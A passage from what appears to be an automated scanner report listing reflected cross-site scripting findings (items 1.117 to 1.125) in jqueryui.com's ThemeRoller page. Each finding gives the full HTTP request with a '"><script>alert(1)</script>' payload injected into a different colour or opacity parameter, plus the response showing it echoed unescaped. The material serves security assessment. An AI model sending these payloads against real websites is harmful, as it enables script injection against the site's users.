
Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fc373"><script>alert(1)</script>3ea55f7fc70&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fc373"><script>alert(1)</script>3ea55f7fc70&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

1.117. http://jqueryui.com/themeroller/ [bgColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc30"><script>alert(1)</script>a9e1b8c37b8 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecdfc30"><script>alert(1)</script>a9e1b8c37b8&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecdfc30"><script>alert(1)</script>a9e1b8c37b8&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

1.118. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e6a"><script>alert(1)</script>8bf4ad7e592 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd1e6a"><script>alert(1)</script>8bf4ad7e592&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd1e6a"><script>alert(1)</script>8bf4ad7e592&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

1.119. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75d5e"><script>alert(1)</script>f1386d08681 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee75d5e"><script>alert(1)</script>f1386d08681&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee75d5e"><script>alert(1)</script>f1386d08681&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

1.120. http://jqueryui.com/themeroller/ [bgColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee34f"><script>alert(1)</script>617f19d2f28 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaee34f"><script>alert(1)</script>617f19d2f28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadaee34f"><script>alert(1)</script>617f19d2f28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

1.121. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf45"><script>alert(1)</script>00cbd4e3568 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa6bf45"><script>alert(1)</script>00cbd4e3568&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa6bf45"><script>alert(1)</script>00cbd4e3568&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.122. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2569"><script>alert(1)</script>93fcf126caf was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaac2569"><script>alert(1)</script>93fcf126caf&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaac2569"><script>alert(1)</script>93fcf126caf&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.123. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8152"><script>alert(1)</script>eb15dc8b101 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65a8152"><script>alert(1)</script>eb15dc8b101&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65a8152"><script>alert(1)</script>eb15dc8b101&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

1.124. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd37"><script>alert(1)</script>061b5e7f4a3 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=757fd37"><script>alert(1)</script>061b5e7f4a3&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=757fd37"><script>alert(1)</script>061b5e7f4a3&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

1.125. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d15"><script>alert(1)</script>a4b6ff2924a was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75c9d15"><script>alert(1)</script>a4b6ff2924a&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgText